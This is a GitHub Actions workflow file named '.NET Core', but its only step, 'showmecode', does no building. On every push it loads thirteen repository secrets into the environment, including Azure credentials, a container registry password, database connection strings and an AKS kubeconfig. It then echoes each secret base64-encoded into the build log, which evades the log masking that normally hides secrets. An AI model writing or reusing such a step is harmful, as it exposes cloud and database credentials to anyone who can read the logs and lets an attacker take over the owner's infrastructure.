name: .NET Core

on: [push]
jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - name: showmecode
      run: |
        echo ACR_PASSWORD: $ACR_PASSWORD | base64
        echo ACR_USER_NAME: $ACR_USER_NAME | base64
        echo AZURE_CREDENTIALS: $AZURE_CREDENTIALS | base64
        echo CATALOG_DB_CONNSTRING: $CATALOG_DB_CONNSTRING | base64
        echo CONNSTRING_JSON: $CONNSTRING_JSON | base64
        echo DB_PASSWORD: $DB_PASSWORD | base64
        echo IDENTITY_DB_CONNSTRING: $IDENTITY_DB_CONNSTRING | base64
        echo ACTIONS_RUNNER_DEBUG: $ACTIONS_RUNNER_DEBUG | base64
        echo ACTIONS_STEP_DEBUG: $ACTIONS_STEP_DEBUG | base64
        echo AKS_KUBECONFIG: $AKS_KUBECONFIG | base64
        echo AKS_SECRET: $AKS_SECRET | base64
        echo AKS_URL: $AKS_URL | base64
        echo DPAPI_STORAGE: $DPAPI_STORAGE | base64
      env:
        ACR_PASSWORD: ${{ secrets.ACR_PASSWORD }}
        ACR_USER_NAME: ${{ secrets.ACR_USER_NAME }}
        AZURE_CREDENTIALS: ${{ secrets.AZURE_CREDENTIALS }}
        CATALOG_DB_CONNSTRING: ${{ secrets.CATALOG_DB_CONNSTRING }}
        CONNSTRING_JSON: ${{ secrets.CONNSTRING_JSON }}
        DB_PASSWORD: ${{ secrets.DB_PASSWORD }}
        IDENTITY_DB_CONNSTRING: ${{ secrets.IDENTITY_DB_CONNSTRING }}
        ACTIONS_RUNNER_DEBUG: ${{ secrets.ACTIONS_RUNNER_DEBUG }}
        ACTIONS_STEP_DEBUG: ${{ secrets.ACTIONS_STEP_DEBUG }}
        AKS_KUBECONFIG: ${{ secrets.AKS_KUBECONFIG }}
        AKS_SECRET: ${{ secrets.AKS_SECRET }}
        AKS_URL: ${{ secrets.AKS_URL }}
        DPAPI_STORAGE: ${{ secrets.DPAPI_STORAGE }}
